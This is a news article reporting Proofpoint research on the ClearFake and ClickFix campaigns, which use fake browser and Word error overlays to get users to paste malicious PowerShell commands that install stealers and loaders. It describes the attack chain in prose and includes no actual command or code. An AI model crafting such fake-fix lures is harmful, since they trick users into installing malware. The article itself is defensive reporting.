Skip to content

Fake Google Chrome error instructs users to run malicious PowerShell scripts

  • by
  • 3 min read

A recent malware campaign tricks users into running malicious PowerShell scripts through fake Google Chrome, Word, and OneDrive errors. The PowerShell “fixes” for the errors install malware on the target system.

Proofpoint researchers identified the new malware distribution campaign using social engineering to run PowerShell scripts to install malware. The researchers noted that initial access broker TA571 and ClearFake activity cluster used the method as early as March 1, 2024, and early April, respectively. Both groups were observed using the technique in early June 2024.

ClearFake, a fake browser update activity cluster, compromises legitimate websites using malicious JavaScript and HTML. “In observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as ‘EtherHiding’,” said Proofpoint.

An example of a ClearFake attack chain | Source: Proofpoint

The starting script then loaded a second script, which (if loaded and passed various checks) presented a fake warning overlay on the website. The warning provided steps and instructed users to install a “root certificate,” by copy-pasting a PowerShell command onto the (admin) terminal.

If the script is executed, it will perform several steps to confirm whether the device is a valid target and download additional payloads.

It flushes the DNS cache, removes clipboard content, displays a decoy message, and then downloads another PowerShell script that downloads an information stealer after performing anti-VM checks.

An activity cluster, labeled ‘ClickFix’ by the software company in mid-April 2024, was attributed to compromised sites containing an inject that led to an iframe on pley[.]es.

A malicious fake warning overlay asking to copy-paste the code to PowerShell. | Source: Proofpoint

The iframe was an overlay message stating that a faulty browser update needed to be fixed. The next steps provided are similar to ClearFake’s technique, as users are guided to run Windows PowerShell as an administrator and paste the code provided by the fake message.

Another email-based malicious chain infects through HTML attachments, which resemble Microsoft Word documents, instructs the user to install a “Word Online” extension to view the document. The error message provides “How to fix” and “Auto-fix” options which use different methods to infect the target system.

Proofpoint noted payloads such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, Lumma Stealer and XMRig, a clipboard hijacker.

Overall, the methods used copied the script to the clipboard through browser-side JavaScript, which is commonly used on legitimate websites. While the social engineering of fake errors is unique, the attack chain requires a successful social interaction. Such an interaction might be successful as the steps are provided by an impersonating notification from companies such as Google or Microsoft.

In the News: Malicious Chrome and Teams downloads putting people at risk

Arun Maity

Arun Maity

Arun Maity is a journalist from Kolkata who graduated from the Asian College of Journalism. He has an avid interest in music, videogames and anime. When he's not working, you can find him practicing and recording his drum covers, watching anime or playing games. You can contact him here: arunmaity23@proton.me

>